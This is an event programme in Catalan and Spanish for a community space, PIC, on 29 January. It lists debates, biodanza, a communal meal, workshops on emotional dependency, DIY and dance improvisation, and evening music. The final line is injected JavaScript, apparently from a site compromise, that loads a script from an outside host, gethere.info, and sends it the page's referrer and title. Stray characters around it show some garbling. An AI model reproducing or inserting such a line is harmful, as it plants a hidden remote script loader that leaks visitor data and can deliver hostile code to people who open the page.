Programació PIC 29Gener

6

MATI’

12.00-14.00: Espacio de debate. Conversa informal sobre sostenibilitat i reptes a Palestina, Jordània i Egipte

Rebrem la visita d’un grup de persones de Palestina, Jordània i Egipte, implicades i interessades
en consum i producció sostenible. Si vols compartir les teves experiències o escoltar les que
vénen d’aquests països, obrirem un espai de conversa informal per a intercanviar opinions,
pràctiques, interrogants… a cárrec de Andrea Calsamiglia

12.00-14.00: Biodanza
La biodanza és un sistema de creixement personal que ens convida a través de la música, el moviment, el cant, les emocions i el grup, a l’experiència intensa de l’ Aquí i Ara, i a l’encontre autèntic d’un mateix, de la Altre i del tot allò que ens envolta. La biodanza ens convida a dansar la vida, a l’expressió saludable del que som, i per això no cal saber ballar.
Places limitades, fes la teva inscripció omplint el següent formulari:
https://goo.gl/rt7YyB

12.00-13.30: Ruta por el proyecto
Nos encontramos a la salida del PIC

14.30-16.00: Dinar popular agroecológic

TARDA

16.00-18.00: GAEDE Revolució afectiva: alló que la dependencia emocional ens ha ensenyat
Encara que per a tots i totes, l’amor, ho sabem o no, es quelcom clau a les nostres vides, també esdevé un tema tabú quan ens plantejem questionar la manera en que estimem per tal d’alliberar els nostres afectes. En l’associació GAEDE treballem per promoure l’educació afectiva de totes les persones i ara us proposem aquest taller per tal de compartir la nostra experiència. Activitat conduida per Sergi Ferré.

16.00-18.00: Introducción al Do-It-Yourself
Una introducción a taladrar y reparar, utilizando taladro de batería para el “hazlo tu mateix”. Desde poner estanterías hasta construir barricadas. No se necesita experiencia. Nos vemos en el patio del PIC

16.00-18.00: CLAM – Conciencia Liberación Alma Movimiento
Éste es un taller experimental en el que la integración de diferentes elementos de la danza y el teatro están dirigidas a una improvisación libre. Con este taller pretendo crear un espacio para comunicarnos con nuestro propio cuerpo, ser más conscientes de la experiencia que vivimos en cada momento y despertar nuestra creatividad para relacionarnos con ella a través del movimiento.
El taller se divide en 2 partes. La primera consta de un calentamiento integral en el que trabajaremos un espacio adecuado de preparación a la segunda parte. En la segunda parte se abre un espacio en el que florece el movimiento improvisado acompañado por un viaje musical.
Primera parte:
Haremos una relajación activa conducida por un viaje sensorial. Despertaremos nuestro movimiento consciente, realizaremos dinámicas de liberación energética. Dirigiremos nuestra atención consciente a través de la respiración, visualización, percepción y movimiento.
Segunda parte:
Trabajaremos de manera orgánica escuchando respetuosamente nuestro cuerpo y dejando fluir libremente nuestro movimiento auténtico, descubriéndolo y dándole su espacio para expresarse. Aquí abrimos el espacio a la improvisación del movimiento.
Objetivos:
– Conectar cuerpo y mente.
– Cultivar la consciencia.
– Limpiar nuestro campo energético.
– Fortalecer y mantener una buena salud física y mental.
Dirigido a:
Todo aquel que quiera conectar un poco más consigo mismo, descubrir sus necesidades corporales, su movimiento, entrenar y dirigir la mente.
Aforo limitado a 12 personas (para mayor calidad).
Tallerista:
Cristina Chacón Cruz, bailarina profesional de diferentes técnicas (danza clásica, contemporánea, española y flamenco), con una formación amplia y diversa de 18 años. Actualmente se dedica a nuevos proyectos de movimiento libre y danza experimental.

Y para acabar…. Música!

18.15-18.45: Fraggle solita – la acordeonista y cantante de Gadjo compartirá unas canciones suyas sobre sus viajes, animales, y como no, el amor…..con humor y intimidad.

18.45-19.30: Ofer y Remy – música del Medio Oriente con laud árabe y djarbuka
6s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;